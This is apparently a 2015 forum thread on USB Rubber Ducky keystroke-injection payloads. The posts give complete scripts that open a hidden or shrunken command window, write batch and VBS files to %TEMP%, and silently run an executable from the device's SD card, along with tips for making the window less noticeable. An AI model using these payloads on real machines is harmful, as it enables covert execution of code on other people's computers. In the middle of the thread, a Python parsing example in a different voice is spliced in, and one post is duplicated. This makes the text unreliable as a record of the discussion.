overwraith Posted April 18, 2015 (edited)

So, it has come to my attention that some of the payloads have a flaw in their processing, whereby the ducky drive finding code will not run correctly if it is not on an admin machine. I have known for a while, but haven't found a way to fix it. The other day I found out about the "vol" command in batch. So if any of you are knowledgeable in batch, I have at least one question: does the "vol" command work on more than one platform, e.g. Windows 7, XP, Vista etc.? If it does we can retool the code to use "vol" instead of diskpart, which has a crippling error when running on non admin computers. Here is some code I have been working on; it executes in the command prompt, not a batch file yet. It doesn't work right yet, I am having trouble with the DuckyDrive variable not setting. If any of you know how to fix this, then please post.

```batch
for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( for /f "tokens=6 delims= " %i in ('Vol %d:') do if %i NEQ "Drive" if %i EQU "DUCKY" echo set DuckyDrive=%d: )
```

Edited April 18, 2015 by overwraith
Xcellerator Posted April 19, 2015

According to https://en.wikipedia.org/wiki/Vol_%28command%29, it's present in DOS, OS/2 and Windows. It doesn't specify exactly what versions of Windows, but if it was in DOS, it's probably been there since forever anyway. Nice fix, by the way!
overwraith Posted April 19, 2015 (Author)

It's not done yet, it is still erroring somewhere. I gotta try to figure out why the set command isn't working. I know the vol command is present on my computer, Windows 7, but it is reassuring to hear that it has been around since DOS.
overwraith Posted April 19, 2015 (Author, edited)

I figured it out, needed quotes in the 'if' statement first parameter. I swear, somebody needs to send me a few batch books, it is difficult gleaning a comprehensive curriculum from just online web pages and snippets. Also factor in that this stuff was pretty much before my time.

```batch
for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( for /f "tokens=6 delims= " %i in ('Vol %d:') do (if "%i" EQU "DUCKY" set DuckyDrive=%d: ))
```

This should be the new RunEXE from SD payload, but I haven't got a chance to test it yet, am downloading something, and apparently every time I plug in the ducky to this expansion USB/SD card slot in the front of my computer it drops all currently connected USB devices. Weird. I need this external hard drive connected during the download.

```
REM Author: overwraith
REM Name: RunEXE_V3.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code.
REM Encoder V2.4+
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DuckyDrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER
```

Edited April 19, 2015 by overwraith
overwraith Posted April 19, 2015 (Author, edited)

ty, I just tested it, had to change a couple of things. Works now. I altered it in my original post. It is also now on the github.

Edited April 19, 2015 by overwraith
White Light Posted April 28, 2015

Personally, I would do something like this, to avoid having to loop through each drive letter:

```batch
for /f "tokens=3" %v in ('ver') do if %v==XP (for /f "tokens=3" %a in ('echo list volume ^| diskpart ^| find "Volume" ^| find "RUN"') do start "" %a:\run.exe) else (for /f %a in ('wmic logicaldisk get volumename^,name ^| find "RUN"') do start "" %a\run.exe)
```

Works on Windows XP using diskpart as well as Vista+ using wmic.
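An added example, not code from this thread or from overwraith or White Light: a small Python parser for the text that `vol X:` and `wmic logicaldisk get volumename,name` print, doing the same "find the drive letter by volume label" job as the batch one-liners above. The command output it works on is constructed inline (drive letters, labels and serial numbers are made up) so it runs offline. It also shows what the batch `for /f "tokens=6"` split actually hands to `if` for each kind of `vol` line (a one-word label, a label containing a space, a drive with no label, the serial-number line with fewer than six tokens), which is the edge case behind the quoting fix overwraith needed: an empty, unquoted `%i` turns `if %i NEQ "Drive"` into `if NEQ "Drive"`, a syntax error.

```python
"""Find a drive letter by volume label from `vol` and `wmic` output.

Added example for this thread; the sample command output below is
constructed, not captured from a real machine.
"""
import re
from typing import Dict, Optional

# Constructed `vol X:` output.  The real command prints two lines per drive:
# one with the label (or "has no label.") and one with the serial number.
VOL_OUTPUT: Dict[str, str] = {
    "C": " Volume in drive C is Windows\n Volume Serial Number is 1A2B-3C4D\n",
    "D": " Volume in drive D has no label.\n Volume Serial Number is 5E6F-7A8B\n",
    "E": " Volume in drive E is MY DUCKY\n Volume Serial Number is 9C0D-1E2F\n",
    "F": " Volume in drive F is DUCKY\n Volume Serial Number is 3A4B-5C6D\n",
}

# Constructed `wmic logicaldisk get volumename,name` output.  wmic prints a
# header row, orders the columns alphabetically (Name before VolumeName) and
# pads each column with spaces; an unlabeled drive has an empty VolumeName.
WMIC_OUTPUT = (
    "Name  VolumeName  \n"
    "C:    Windows     \n"
    "D:                \n"
    "E:    MY DUCKY    \n"
    "F:    DUCKY       \n"
    "\n"
)


def sixth_token(line: str) -> str:
    """What `for /f "tokens=6 delims= "` hands the batch `if` for one line.

    Empty when the line has fewer than six whitespace-separated words, which
    is exactly what the serial-number line does.
    """
    tokens = line.split()
    return tokens[5] if len(tokens) > 5 else ""


def vol_label(vol_text: str) -> Optional[str]:
    """Return the label from `vol` output, or None when the drive has none.

    Anchoring on the fixed "Volume in drive X is " prefix keeps labels with
    spaces intact ("MY DUCKY"), whereas the sixth token would be just "MY",
    and "no" for a drive that "has no label.".
    """
    m = re.search(r"^ ?Volume in drive \w (?:is (.+)|has no label\.)$",
                  vol_text, re.M)
    if m is None:
        raise ValueError("unrecognized vol output")
    return m.group(1)


def find_drive_vol(label: str, outputs: Dict[str, str]) -> Optional[str]:
    """Drive letter (e.g. 'F:') whose `vol` output carries exactly `label`."""
    for letter, text in outputs.items():
        if vol_label(text) == label:
            return f"{letter}:"
    return None


def find_drive_wmic(label: str, wmic_text: str) -> Optional[str]:
    """Drive letter whose wmic VolumeName column equals `label`.

    The batch one-liner filters with `find "RUN"`, a substring match that
    would also accept a label such as "RUNNING"; comparing the whole label
    after splitting the row avoids that.
    """
    for row in wmic_text.splitlines()[1:]:   # skip the header row
        parts = row.split(None, 1)           # "F:" and the rest of the row
        if len(parts) < 2:
            continue                         # blank line or unlabeled drive
        name, volname = parts[0], parts[1].strip()
        if volname == label:
            return name
    return None


if __name__ == "__main__":
    for letter, text in VOL_OUTPUT.items():
        first, second = text.splitlines()
        print(letter, "tokens=6 gives", repr(sixth_token(first)),
              "and", repr(sixth_token(second)), "; parsed label:",
              repr(vol_label(text)))
    print("vol :", find_drive_vol("DUCKY", VOL_OUTPUT))
    print("wmic:", find_drive_wmic("DUCKY", WMIC_OUTPUT))
```

Running it prints, per drive, the token the batch loop would test and the label the regex recovers; both finders return `F:` for the label `DUCKY`, and `find_drive_vol("MY DUCKY", ...)` returns `E:` where the token split would never match.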
overwraith Posted April 28, 2015 (Author, edited)

Yes, except if you are non admin, or guest, which will make a diskpart black box pop up, derailing the script. There was a reason I was exploring alternate routes. Also, ducks used to be a lot slower than they are now, I would have to test if it automatically mounts the SD immediately.

Edited April 28, 2015 by overwraith
White Light Posted May 6, 2015

If you look, it actually only uses diskpart on XP (as XP Home doesn't have access to the WMI console). Everything else is all just done in one command. If you were to run CMD and have the above run via the command line directly, the box would be visible only for the amount of time necessary to either query diskpart or WMIC (a few seconds at most). Ducks only seem to mount the FS slowly the first time it is plugged into a computer, making testing timings difficult. I've got a work-in-progress using VBS to loop in the background waiting for the drive to load, which means that timing wouldn't ever be an issue. In the meantime, I would suggest that instead of using

```batch
cmd /Q /D /T:7F /F:OFF /V:ON /K
```

you could try changing the colour setting to something with two dark settings, like 01 (if my memory serves that's dark blue on black background). You could also try reducing the console size to the bare minimum (1 line and somewhere between 10-18 columns, I can never remember).

```batch
cmd /Q /D /T:01 /F:OFF /V:ON /K mode con cols=18 lines=1
```

Please forgive any mistakes. I'm on mobile right now, so I can't exactly test the syntax of the mode command.
overwraith Posted May 6, 2015 (Author)

Ok, I see the logic now. That's also a good solution.
White Light Posted May 7, 2015

Here's the VBS code I've been working on, along with the modified CMD string.

```
REM DEFAULT_DELAY 20
DELAY 2000
GUI r
DELAY 100
STRING cmd /T:01 /K mode con cols=15 lines=1&copy /y con %tmp%\z.vbs
ENTER
DELAY 300
STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d=""
ENTER
STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name
ENTER
STRING if d="" then wscript.sleep 500
ENTER
STRING loop
ENTER
STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false
ENTER
DELAY 10
CTRL z
ENTER
DELAY 50
STRING start "" %tmp%\z.vbs&exit
ENTER
```
White Light Posted May 7, 2015

Here's the VBS code I've been working on, along with the modified CMD string.

```
REM DEFAULT_DELAY 20
DELAY 2000
GUI r
DELAY 100
STRING cmd /T:01 /K mode con cols=15 lines=1&copy /y con %tmp%\z.vbs
ENTER
DELAY 300
STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d=""
ENTER
STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name
ENTER
STRING if d="" then wscript.sleep 500
ENTER
STRING loop
ENTER
STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false
ENTER
DELAY 10
CTRL z
ENTER
DELAY 50
STRING start "" %tmp%\z.vbs&exit
ENTER
```

Weird, it didn't include everything I typed after the code. I really can't be bothered to type out all that again, but I'll summarize. Some CMD switches do little or nothing at all; I've included only the ones necessary. Making the window smaller using mode instead of moving it is probably less noticeable. Moving to the left is better than down, as the window generally spawns in the upper-left side of the screen. The VBS code runs silent and loops until it finds the drive named "DUCKY". I'm 90% certain the VBS code will work on all XP versions and above. If it won't work on something, it'll be XP Home.